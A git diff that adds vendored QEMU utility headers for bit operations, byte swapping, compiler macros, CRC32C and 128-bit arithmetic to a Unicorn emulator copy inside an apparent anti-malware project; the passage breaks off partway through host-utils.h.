b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitops.h new file mode 100644 index 0000000..b523df9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitops.h @@ -0,0 +1,408 @@ +/* + * Bitops Module + * + * Copyright (C) 2010 Corentin Chary <corentin.chary@gmail.com> + * + * Mostly inspired by (stolen from) linux/bitmap.h and linux/bitops.h + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or 
later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef BITOPS_H +#define BITOPS_H + +#include "unicorn/platform.h" +#include <assert.h> + +#include "host-utils.h" + +#define BITS_PER_BYTE CHAR_BIT +#define BITS_PER_LONG (sizeof (unsigned long) * BITS_PER_BYTE) + +#define BIT(nr) (1UL << (nr)) +#define BIT_MASK(nr) (1UL << ((nr) % BITS_PER_LONG)) +#define BIT_WORD(nr) ((nr) / BITS_PER_LONG) +#define BITS_TO_LONGS(nr) DIV_ROUND_UP(nr, BITS_PER_BYTE * sizeof(long)) + +/** + * set_bit - Set a bit in memory + * @nr: the bit to set + * @addr: the address to start counting from + */ +static inline void set_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + + *p |= mask; +} + +/** + * clear_bit - Clears a bit in memory + * @nr: Bit to clear + * @addr: Address to start counting from + */ +static inline void clear_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + + *p &= ~mask; +} + +/** + * change_bit - Toggle a bit in memory + * @nr: Bit to change + * @addr: Address to start counting from + */ +static inline void change_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + + *p ^= mask; +} + +/** + * test_and_set_bit - Set a bit and return its old value + * @nr: Bit to set + * @addr: Address to count from + */ +static inline int test_and_set_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + unsigned long old = *p; + + *p = old | mask; + return (old & mask) != 0; +} + +/** + * test_and_clear_bit - Clear a bit and return its old value + * @nr: Bit to clear + * @addr: Address to count from + */ +static inline int test_and_clear_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + unsigned long old = *p; + + *p = old & ~mask; 
+ return (old & mask) != 0; +} + +/** + * test_and_change_bit - Change a bit and return its old value + * @nr: Bit to change + * @addr: Address to count from + */ +static inline int test_and_change_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + unsigned long old = *p; + + *p = old ^ mask; + return (old & mask) != 0; +} + +/** + * test_bit - Determine whether a bit is set + * @nr: bit number to test + * @addr: Address to start counting from + */ +static inline int test_bit(long nr, const unsigned long *addr) +{ + return 1UL & (addr[BIT_WORD(nr)] >> (nr & (BITS_PER_LONG-1))); +} + +/** + * find_next_bit - find the next set bit in a memory region + * @addr: The address to base the search on + * @offset: The bitnumber to start searching at + * @size: The bitmap size in bits + */ +unsigned long find_next_bit(const unsigned long *addr, + unsigned long size, unsigned long offset); + +/** + * find_next_zero_bit - find the next cleared bit in a memory region + * @addr: The address to base the search on + * @offset: The bitnumber to start searching at + * @size: The bitmap size in bits + */ + +unsigned long find_next_zero_bit(const unsigned long *addr, + unsigned long size, + unsigned long offset); + +/** + * find_first_bit - find the first set bit in a memory region + * @addr: The address to start the search at + * @size: The maximum size to search + * + * Returns the bit number of the first set bit. + */ +static inline unsigned long find_first_bit(const unsigned long *addr, + unsigned long size) +{ + unsigned long result, tmp; + + for (result = 0; result < size; result += BITS_PER_LONG) { + tmp = *addr++; + if (tmp) { + result += ctzl(tmp); + return result < size ? 
result : size; + } + } + /* Not found */ + return size; +} + +/** + * find_first_zero_bit - find the first cleared bit in a memory region + * @addr: The address to start the search at + * @size: The maximum size to search + * + * Returns the bit number of the first cleared bit. + */ +static inline unsigned long find_first_zero_bit(const unsigned long *addr, + unsigned long size) +{ + return find_next_zero_bit(addr, size, 0); +} + +static inline unsigned long hweight_long(unsigned long w) +{ + unsigned long count; + + for (count = 0; w; w >>= 1) { + count += w & 1; + } + return count; +} + +/** + * rol8 - rotate an 8-bit value left + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint8_t rol8(uint8_t word, unsigned int shift) +{ + return (word << shift) | (word >> (8 - shift)); +} + +/** + * ror8 - rotate an 8-bit value right + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint8_t ror8(uint8_t word, unsigned int shift) +{ + return (word >> shift) | (word << (8 - shift)); +} + +/** + * rol16 - rotate a 16-bit value left + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint16_t rol16(uint16_t word, unsigned int shift) +{ + return (word << shift) | (word >> (16 - shift)); +} + +/** + * ror16 - rotate a 16-bit value right + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint16_t ror16(uint16_t word, unsigned int shift) +{ + return (word >> shift) | (word << (16 - shift)); +} + +/** + * rol32 - rotate a 32-bit value left + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint32_t rol32(uint32_t word, unsigned int shift) +{ + return (word << shift) | (word >> (32 - shift)); +} + +/** + * ror32 - rotate a 32-bit value right + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint32_t ror32(uint32_t word, unsigned int shift) +{ + return (word >> shift) | (word << ((32 - shift) & 0x1f)); +} + +/** + * rol64 - rotate a 64-bit value left + * 
@word: value to rotate + * @shift: bits to roll + */ +static inline uint64_t rol64(uint64_t word, unsigned int shift) +{ + return (word << shift) | (word >> (64 - shift)); +} + +/** + * ror64 - rotate a 64-bit value right + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint64_t ror64(uint64_t word, unsigned int shift) +{ + return (word >> shift) | (word << (64 - shift)); +} + +/** + * extract32: + * @value: the value to extract the bit field from + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * + * Extract from the 32 bit input @value the bit field specified by the + * @start and @length parameters, and return it. The bit field must + * lie entirely within the 32 bit word. It is valid to request that + * all 32 bits are returned (ie @length 32 and @start 0). + * + * Returns: the value of the bit field extracted from the input value. + */ +static inline uint32_t extract32(uint32_t value, int start, int length) +{ + assert(start >= 0 && length > 0 && length <= 32 - start); + return (value >> start) & (~0U >> (32 - length)); +} + +/** + * extract64: + * @value: the value to extract the bit field from + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * + * Extract from the 64 bit input @value the bit field specified by the + * @start and @length parameters, and return it. The bit field must + * lie entirely within the 64 bit word. It is valid to request that + * all 64 bits are returned (ie @length 64 and @start 0). + * + * Returns: the value of the bit field extracted from the input value. 
+ */ +static inline uint64_t extract64(uint64_t value, int start, int length) +{ + assert(start >= 0 && length > 0 && length <= 64 - start); + return (value >> start) & (~0ULL >> (64 - length)); +} + +/** + * sextract32: + * @value: the value to extract the bit field from + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * + * Extract from the 32 bit input @value the bit field specified by the + * @start and @length parameters, and return it, sign extended to + * an int32_t (ie with the most significant bit of the field propagated + * to all the upper bits of the return value). The bit field must lie + * entirely within the 32 bit word. It is valid to request that + * all 32 bits are returned (ie @length 32 and @start 0). + * + * Returns: the sign extended value of the bit field extracted from the + * input value. + */ +static inline int32_t sextract32(uint32_t value, int start, int length) +{ + assert(start >= 0 && length > 0 && length <= 32 - start); + /* Note that this implementation relies on right shift of signed + * integers being an arithmetic shift. + */ + return ((int32_t)(value << (32 - length - start))) >> (32 - length); +} + +/** + * sextract64: + * @value: the value to extract the bit field from + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * + * Extract from the 64 bit input @value the bit field specified by the + * @start and @length parameters, and return it, sign extended to + * an int64_t (ie with the most significant bit of the field propagated + * to all the upper bits of the return value). The bit field must lie + * entirely within the 64 bit word. It is valid to request that + * all 64 bits are returned (ie @length 64 and @start 0). + * + * Returns: the sign extended value of the bit field extracted from the + * input value. 
+ */ +static inline uint64_t sextract64(uint64_t value, int start, int length) +{ + assert(start >= 0 && length > 0 && length <= 64 - start); + /* Note that this implementation relies on right shift of signed + * integers being an arithmetic shift. + */ + return ((int64_t)(value << (64 - length - start))) >> (64 - length); +} + +/** + * deposit32: + * @value: initial value to insert bit field into + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * @fieldval: the value to insert into the bit field + * + * Deposit @fieldval into the 32 bit @value at the bit field specified + * by the @start and @length parameters, and return the modified + * @value. Bits of @value outside the bit field are not modified. + * Bits of @fieldval above the least significant @length bits are + * ignored. The bit field must lie entirely within the 32 bit word. + * It is valid to request that all 32 bits are modified (ie @length + * 32 and @start 0). + * + * Returns: the modified @value. + */ +static inline uint32_t deposit32(uint32_t value, int start, int length, + uint32_t fieldval) +{ + uint32_t mask; + assert(start >= 0 && length > 0 && length <= 32 - start); + mask = (~0U >> (32 - length)) << start; + return (value & ~mask) | ((fieldval << start) & mask); +} + +/** + * deposit64: + * @value: initial value to insert bit field into + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * @fieldval: the value to insert into the bit field + * + * Deposit @fieldval into the 64 bit @value at the bit field specified + * by the @start and @length parameters, and return the modified + * @value. Bits of @value outside the bit field are not modified. + * Bits of @fieldval above the least significant @length bits are + * ignored. The bit field must lie entirely within the 64 bit word. + * It is valid to request that all 64 bits are modified (ie @length + * 64 and @start 0). 
+ * + * Returns: the modified @value. + */ +static inline uint64_t deposit64(uint64_t value, int start, int length, + uint64_t fieldval) +{ + uint64_t mask; + assert(start >= 0 && length > 0 && length <= 64 - start); + mask = (~0ULL >> (64 - length)) << start; + return (value & ~mask) | ((fieldval << start) & mask); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bswap.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bswap.h new file mode 100644 index 0000000..9d069d0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bswap.h @@ -0,0 +1,434 @@ +#ifndef BSWAP_H +#define BSWAP_H + +#include "config-host.h" +#include "unicorn/platform.h" +#include <limits.h> +#include <string.h> +#include "fpu/softfloat.h" + +#ifdef CONFIG_MACHINE_BSWAP_H +# include <sys/endian.h> +# include <sys/types.h> +# include <machine/bswap.h> +#elif defined(__FreeBSD__) +# include <sys/endian.h> +#elif defined(CONFIG_BYTESWAP_H) +# include <byteswap.h> + +static inline uint16_t bswap16(uint16_t x) +{ + return bswap_16(x); +} + +static inline uint32_t bswap32(uint32_t x) +{ + return bswap_32(x); +} + +static inline uint64_t bswap64(uint64_t x) +{ + return bswap_64(x); +} +# else +static inline uint16_t bswap16(uint16_t x) +{ + return (((x & 0x00ff) << 8) | + ((x & 0xff00) >> 8)); +} + +static inline uint32_t bswap32(uint32_t x) +{ + return (((x & 0x000000ffU) << 24) | + ((x & 0x0000ff00U) << 8) | + ((x & 0x00ff0000U) >> 8) | + ((x & 0xff000000U) >> 24)); +} + +static inline uint64_t bswap64(uint64_t x) +{ + return (((x & 0x00000000000000ffULL) << 56) | + ((x & 0x000000000000ff00ULL) << 40) | + ((x & 0x0000000000ff0000ULL) << 24) | + ((x & 0x00000000ff000000ULL) << 8) | + ((x & 0x000000ff00000000ULL) >> 8) | + ((x & 0x0000ff0000000000ULL) >> 24) | + ((x & 0x00ff000000000000ULL) >> 40) | + ((x & 0xff00000000000000ULL) >> 56)); +} +#endif /* ! 
CONFIG_MACHINE_BSWAP_H */ + +static inline void bswap16s(uint16_t *s) +{ + *s = bswap16(*s); +} + +static inline void bswap32s(uint32_t *s) +{ + *s = bswap32(*s); +} + +static inline void bswap64s(uint64_t *s) +{ + *s = bswap64(*s); +} + +#if defined(HOST_WORDS_BIGENDIAN) +#define be_bswap(v, size) (v) +#define le_bswap(v, size) glue(bswap, size)(v) +#define be_bswaps(v, size) +#define le_bswaps(p, size) do { *p = glue(bswap, size)(*p); } while(0) +#else +#define le_bswap(v, size) (v) +#define be_bswap(v, size) glue(bswap, size)(v) +#define le_bswaps(v, size) +#define be_bswaps(p, size) do { *p = glue(bswap, size)(*p); } while(0) +#endif + +#define CPU_CONVERT(endian, size, type)\ +static inline type endian ## size ## _to_cpu(type v)\ +{\ + return glue(endian, _bswap)(v, size);\ +}\ +\ +static inline type cpu_to_ ## endian ## size(type v)\ +{\ + return glue(endian, _bswap)(v, size);\ +}\ +\ +static inline void endian ## size ## _to_cpus(type *p)\ +{\ + glue(endian, _bswaps)(p, size);\ +}\ +\ +static inline void cpu_to_ ## endian ## size ## s(type *p)\ +{\ + glue(endian, _bswaps)(p, size);\ +}\ +\ +static inline type endian ## size ## _to_cpup(const type *p)\ +{\ + return glue(glue(endian, size), _to_cpu)(*p);\ +}\ +\ +static inline void cpu_to_ ## endian ## size ## w(type *p, type v)\ +{\ + *p = glue(glue(cpu_to_, endian), size)(v);\ +} + +CPU_CONVERT(be, 16, uint16_t) +CPU_CONVERT(be, 32, uint32_t) +CPU_CONVERT(be, 64, uint64_t) + +CPU_CONVERT(le, 16, uint16_t) +CPU_CONVERT(le, 32, uint32_t) +CPU_CONVERT(le, 64, uint64_t) + +/* len must be one of 1, 2, 4 */ +static inline uint32_t qemu_bswap_len(uint32_t value, int len) +{ + return bswap32(value) >> (32 - 8 * len); +} + +/* Unions for reinterpreting between floats and integers. 
*/ + +typedef union { + float32 f; + uint32_t l; +} CPU_FloatU; + +typedef union { + float64 d; +#if defined(HOST_WORDS_BIGENDIAN) + struct { + uint32_t upper; + uint32_t lower; + } l; +#else + struct { + uint32_t lower; + uint32_t upper; + } l; +#endif + uint64_t ll; +} CPU_DoubleU; + +typedef union { + floatx80 d; + struct { + uint64_t lower; + uint16_t upper; + } l; +} CPU_LDoubleU; + +typedef union { + float128 q; +#if defined(HOST_WORDS_BIGENDIAN) + struct { + uint32_t upmost; + uint32_t upper; + uint32_t lower; + uint32_t lowest; + } l; + struct { + uint64_t upper; + uint64_t lower; + } ll; +#else + struct { + uint32_t lowest; + uint32_t lower; + uint32_t upper; + uint32_t upmost; + } l; + struct { + uint64_t lower; + uint64_t upper; + } ll; +#endif +} CPU_QuadU; + +/* unaligned/endian-independent pointer access */ + +/* + * the generic syntax is: + * + * load: ld{type}{sign}{size}{endian}_p(ptr) + * + * store: st{type}{size}{endian}_p(ptr, val) + * + * Note there are small differences with the softmmu access API! + * + * type is: + * (empty): integer access + * f : float access + * + * sign is: + * (empty): for floats or 32 bit size + * u : unsigned + * s : signed + * + * size is: + * b: 8 bits + * w: 16 bits + * l: 32 bits + * q: 64 bits + * + * endian is: + * he : host endian + * be : big endian + * le : little endian + * (except for byte accesses, which have no endian infix). + */ + +static inline int ldub_p(const void *ptr) +{ + return *(uint8_t *)ptr; +} + +static inline int ldsb_p(const void *ptr) +{ + return *(int8_t *)ptr; +} + +static inline void stb_p(void *ptr, uint8_t v) +{ + *(uint8_t *)ptr = v; +} + +/* Any compiler worth its salt will turn these memcpy into native unaligned + operations. Thus we don't need to play games with packed attributes, or + inline byte-by-byte stores. 
*/ + +static inline int lduw_he_p(const void *ptr) +{ + uint16_t r; + memcpy(&r, ptr, sizeof(r)); + return r; +} + +static inline int ldsw_he_p(const void *ptr) +{ + int16_t r; + memcpy(&r, ptr, sizeof(r)); + return r; +} + +static inline void stw_he_p(void *ptr, uint16_t v) +{ + memcpy(ptr, &v, sizeof(v)); +} + +static inline int ldl_he_p(const void *ptr) +{ + int32_t r; + memcpy(&r, ptr, sizeof(r)); + return r; +} + +static inline void stl_he_p(void *ptr, uint32_t v) +{ + memcpy(ptr, &v, sizeof(v)); +} + +static inline uint64_t ldq_he_p(const void *ptr) +{ + uint64_t r; + memcpy(&r, ptr, sizeof(r)); + return r; +} + +static inline void stq_he_p(void *ptr, uint64_t v) +{ + memcpy(ptr, &v, sizeof(v)); +} + +static inline int lduw_le_p(const void *ptr) +{ + return (uint16_t)le_bswap(lduw_he_p(ptr), 16); +} + +static inline int ldsw_le_p(const void *ptr) +{ + return (int16_t)le_bswap(lduw_he_p(ptr), 16); +} + +static inline int ldl_le_p(const void *ptr) +{ + return le_bswap(ldl_he_p(ptr), 32); +} + +static inline uint64_t ldq_le_p(const void *ptr) +{ + return le_bswap(ldq_he_p(ptr), 64); +} + +static inline void stw_le_p(void *ptr, uint16_t v) +{ + stw_he_p(ptr, le_bswap(v, 16)); +} + +static inline void stl_le_p(void *ptr, uint32_t v) +{ + stl_he_p(ptr, le_bswap(v, 32)); +} + +static inline void stq_le_p(void *ptr, uint64_t v) +{ + stq_he_p(ptr, le_bswap(v, 64)); +} + +/* float access */ + +static inline float32 ldfl_le_p(const void *ptr) +{ + CPU_FloatU u; + u.l = ldl_le_p(ptr); + return u.f; +} + +static inline void stfl_le_p(void *ptr, float32 v) +{ + CPU_FloatU u; + u.f = v; + stl_le_p(ptr, u.l); +} + +static inline float64 ldfq_le_p(const void *ptr) +{ + CPU_DoubleU u; + u.ll = ldq_le_p(ptr); + return u.d; +} + +static inline void stfq_le_p(void *ptr, float64 v) +{ + CPU_DoubleU u; + u.d = v; + stq_le_p(ptr, u.ll); +} + +static inline int lduw_be_p(const void *ptr) +{ + return (uint16_t)be_bswap(lduw_he_p(ptr), 16); +} + +static inline int ldsw_be_p(const void 
*ptr) +{ + return (int16_t)be_bswap(lduw_he_p(ptr), 16); +} + +static inline int ldl_be_p(const void *ptr) +{ + return be_bswap(ldl_he_p(ptr), 32); +} + +static inline uint64_t ldq_be_p(const void *ptr) +{ + return be_bswap(ldq_he_p(ptr), 64); +} + +static inline void stw_be_p(void *ptr, uint16_t v) +{ + stw_he_p(ptr, be_bswap(v, 16)); +} + +static inline void stl_be_p(void *ptr, uint32_t v) +{ + stl_he_p(ptr, be_bswap(v, 32)); +} + +static inline void stq_be_p(void *ptr, uint64_t v) +{ + stq_he_p(ptr, be_bswap(v, 64)); +} + +/* float access */ + +static inline float32 ldfl_be_p(const void *ptr) +{ + CPU_FloatU u; + u.l = ldl_be_p(ptr); + return u.f; +} + +static inline void stfl_be_p(void *ptr, float32 v) +{ + CPU_FloatU u; + u.f = v; + stl_be_p(ptr, u.l); +} + +static inline float64 ldfq_be_p(const void *ptr) +{ + CPU_DoubleU u; + u.ll = ldq_be_p(ptr); + return u.d; +} + +static inline void stfq_be_p(void *ptr, float64 v) +{ + CPU_DoubleU u; + u.d = v; + stq_be_p(ptr, u.ll); +} + +static inline unsigned long leul_to_cpu(unsigned long v) +{ + /* In order to break an include loop between here and + qemu-common.h, don't rely on HOST_LONG_BITS. 
*/ +#if ULONG_MAX == UINT32_MAX + return le_bswap(v, 32); +#elif ULONG_MAX == UINT64_MAX + return le_bswap(v, 64); +#else +# error Unknown sizeof long +#endif +} + +#undef le_bswap +#undef be_bswap +#undef le_bswaps +#undef be_bswaps + +#endif /* BSWAP_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/compiler.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/compiler.h new file mode 100644 index 0000000..d0e322f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/compiler.h @@ -0,0 +1,137 @@ +/* public domain */ + +#ifndef COMPILER_H +#define COMPILER_H + +#include "config-host.h" +#include "unicorn/platform.h" + +#ifdef _MSC_VER +// MSVC support + +#define inline __inline +#define __func__ __FUNCTION__ + +#include <math.h> +#include <float.h> + +#if _MSC_VER < MSC_VER_VS2013 +#define isinf(x) (!_finite(x)) +#if defined(_WIN64) +#define isnan _isnanf +#else +#define isnan _isnan +#endif +#endif + +/* gcc __builtin___clear_cache() */ +static inline void __builtin___clear_cache(void *beg, void *e) +{ + unsigned char *start = beg; + unsigned char *end = e; + FlushInstructionCache(GetCurrentProcess(), start, end - start); +} + +static inline double rint( double x ) +{ + return floor(x < 0 ? 
x - 0.5 : x + 0.5); +} + +union MSVC_FLOAT_HACK +{ + unsigned char Bytes[4]; + float Value; +}; + +#ifndef NAN +static union MSVC_FLOAT_HACK __NAN = {{0x00, 0x00, 0xC0, 0x7F}}; +#define NAN (__NAN.Value) +#endif + +#define QEMU_DIV0 __pragma(warning(suppress:2124)) // divide by zero error + +#define QEMU_GNUC_PREREQ(maj, min) 0 + +#define QEMU_NORETURN __declspec(noreturn) +#define QEMU_UNUSED_VAR __pragma(warning(suppress:4100)) // unused variables only +#define QEMU_UNUSED_FUNC +#define QEMU_WARN_UNUSED_RESULT +#define QEMU_ARTIFICIAL +#define QEMU_PACK( __Declaration__ ) __pragma( pack(push, 1) ) __Declaration__ __pragma( pack(pop) ) + +#define QEMU_ALIGN(A, B) __declspec(align(A)) B + +#define cat(x,y) x ## y +#define cat2(x,y) cat(x,y) +#define QEMU_BUILD_BUG_ON(x) \ + typedef char cat2(qemu_build_bug_on__,__LINE__)[(x)?-1:1] QEMU_UNUSED_VAR; + +#define GCC_FMT_ATTR(n, m) + +#else + +#ifndef NAN +#define NAN (0.0 / 0.0) +#endif + +/*---------------------------------------------------------------------------- +| The macro QEMU_GNUC_PREREQ tests for minimum version of the GNU C compiler. +| The code is a copy of SOFTFLOAT_GNUC_PREREQ, see softfloat-macros.h. 
+*----------------------------------------------------------------------------*/ +#if defined(__GNUC__) && defined(__GNUC_MINOR__) +# define QEMU_GNUC_PREREQ(maj, min) \ + ((__GNUC__ << 16) + __GNUC_MINOR__ >= ((maj) << 16) + (min)) +#else +# define QEMU_GNUC_PREREQ(maj, min) 0 +#endif + +#define QEMU_NORETURN __attribute__ ((__noreturn__)) + +#define QEMU_UNUSED_VAR __attribute__((unused)) +#define QEMU_UNUSED_FUNC __attribute__((unused)) + +#if QEMU_GNUC_PREREQ(3, 4) +#define QEMU_WARN_UNUSED_RESULT __attribute__((warn_unused_result)) +#else +#define QEMU_WARN_UNUSED_RESULT +#endif + +#if QEMU_GNUC_PREREQ(4, 3) +#define QEMU_ARTIFICIAL __attribute__((always_inline, artificial)) +#else +#define QEMU_ARTIFICIAL +#endif + +#if defined(_WIN32) +# define QEMU_PACK( __Declaration__ ) __Declaration__ __attribute__((gcc_struct, packed)) +#else +# define QEMU_PACK( __Declaration__ ) __Declaration__ __attribute__((packed)) +#endif + +#define QEMU_ALIGN(A, B) B __attribute__((aligned(A))) + +#define cat(x,y) x ## y +#define cat2(x,y) cat(x,y) +#define QEMU_BUILD_BUG_ON(x) \ + typedef char cat2(qemu_build_bug_on__,__LINE__)[(x)?-1:1] __attribute__((unused)); + +#if defined __GNUC__ +# if !QEMU_GNUC_PREREQ(4, 4) + /* gcc versions before 4.4.x don't support gnu_printf, so use printf. */ +# define GCC_FMT_ATTR(n, m) __attribute__((format(printf, n, m))) +# else + /* Use gnu_printf when supported (qemu uses standard format strings). */ +# define GCC_FMT_ATTR(n, m) __attribute__((format(gnu_printf, n, m))) +# if defined(_WIN32) + /* Map __printf__ to __gnu_printf__ because we want standard format strings + * even when MinGW or GLib include files use __printf__. 
*/ +# define __printf__ __gnu_printf__ +# endif +# endif +#else +#define GCC_FMT_ATTR(n, m) +#endif + +#endif // _MSC_VER + +#endif /* COMPILER_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/crc32c.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/crc32c.h new file mode 100644 index 0000000..dafb6a1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/crc32c.h @@ -0,0 +1,35 @@ +/* + * Castagnoli CRC32C Checksum Algorithm + * + * Polynomial: 0x11EDC6F41 + * + * Castagnoli93: Guy Castagnoli and Stefan Braeuer and Martin Herrman + * "Optimization of Cyclic Redundancy-Check Codes with 24 + * and 32 Parity Bits",IEEE Transactions on Communication, + * Volume 41, Number 6, June 1993 + * + * Copyright (c) 2013 Red Hat, Inc., + * + * Authors: + * Jeff Cody <jcody@redhat.com> + * + * Based on the Linux kernel cryptographic crc32c module, + * + * Copyright (c) 2004 Cisco Systems, Inc. + * Copyright (c) 2008 Herbert Xu <herbert@gondor.apana.org.au> + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the Free + * Software Foundation; either version 2 of the License, or (at your option) + * any later version. + * + */ + +#ifndef QEMU_CRC32C_H +#define QEMU_CRC32C_H + +#include "qemu-common.h" + +uint32_t crc32c(uint32_t crc, const uint8_t *data, unsigned int length); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/host-utils.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/host-utils.h new file mode 100644 index 0000000..f6157cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/host-utils.h @@ -0,0 +1,382 @@ +/* + * Utility compute operations used by translated code. 
+ * + * Copyright (c) 2007 Thiemo Seufer + * Copyright (c) 2007 Jocelyn Mayer + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#ifndef HOST_UTILS_H +#define HOST_UTILS_H 1 + +#include "qemu/compiler.h" /* QEMU_GNUC_PREREQ */ +#include <limits.h> + +#ifdef CONFIG_INT128 +static inline void mulu64(uint64_t *plow, uint64_t *phigh, + uint64_t a, uint64_t b) +{ + __uint128_t r = (__uint128_t)a * b; + *plow = r; + *phigh = r >> 64; +} + +static inline void muls64(uint64_t *plow, uint64_t *phigh, + int64_t a, int64_t b) +{ + __int128_t r = (__int128_t)a * b; + *plow = r; + *phigh = r >> 64; +} + +static inline int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor) +{ + if (divisor == 0) { + return 1; + } else { + __uint128_t dividend = ((__uint128_t)*phigh << 64) | *plow; + __uint128_t result = dividend / divisor; + *plow = result; + *phigh = dividend % divisor; + return result > UINT64_MAX; + } +} + +static inline int divs128(int64_t *plow, int64_t *phigh, int64_t divisor) +{ + if (divisor == 0) { + return 1; + } else { + __int128_t dividend = ((__int128_t)*phigh << 64) | *plow; + __int128_t result = dividend / divisor; + *plow = result; + *phigh = dividend % divisor; + return result != *plow; + } +} +#else +void muls64(uint64_t *phigh, uint64_t *plow, int64_t a, int64_t b); +void mulu64(uint64_t *phigh, uint64_t *plow, uint64_t a, uint64_t b); +int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor); +int divs128(int64_t *plow, int64_t *phigh, int64_t divisor); +#endif + +/** + * clz32 - count leading zeros in a 32-bit value. + * @val: The value to search + * + * Returns 32 if the value is zero. Note that the GCC builtin is + * undefined if the value is zero. + */ +static inline int clz32(uint32_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return val ? __builtin_clz(val) : 32; +#else + /* Binary search for the leading one bit. 
*/ + int cnt = 0; + + if (!(val & 0xFFFF0000U)) { + cnt += 16; + val <<= 16; + } + if (!(val & 0xFF000000U)) { + cnt += 8; + val <<= 8; + } + if (!(val & 0xF0000000U)) { + cnt += 4; + val <<= 4; + } + if (!(val & 0xC0000000U)) { + cnt += 2; + val <<= 2; + } + if (!(val & 0x80000000U)) { + cnt++; + val <<= 1; + } + if (!(val & 0x80000000U)) { + cnt++; + } + return cnt; +#endif +} + +/** + * clo32 - count leading ones in a 32-bit value. + * @val: The value to search + * + * Returns 32 if the value is -1. + */ +static inline int clo32(uint32_t val) +{ + return clz32(~val); +} + +/** + * clz64 - count leading zeros in a 64-bit value. + * @val: The value to search + * + * Returns 64 if the value is zero. Note that the GCC builtin is + * undefined if the value is zero. + */ +static inline int clz64(uint64_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return val ? __builtin_clzll(val) : 64; +#else + int cnt = 0; + + if (!(val >> 32)) { + cnt += 32; + } else { + val >>= 32; + } + + return cnt + clz32((uint32_t)val); +#endif +} + +/** + * clo64 - count leading ones in a 64-bit value. + * @val: The value to search + * + * Returns 64 if the value is -1. + */ +static inline int clo64(uint64_t val) +{ + return clz64(~val); +} + +/** + * ctz32 - count trailing zeros in a 32-bit value. + * @val: The value to search + * + * Returns 32 if the value is zero. Note that the GCC builtin is + * undefined if the value is zero. + */ +static inline int ctz32(uint32_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return val ? __builtin_ctz(val) : 32; +#else + /* Binary search for the trailing one bit. 
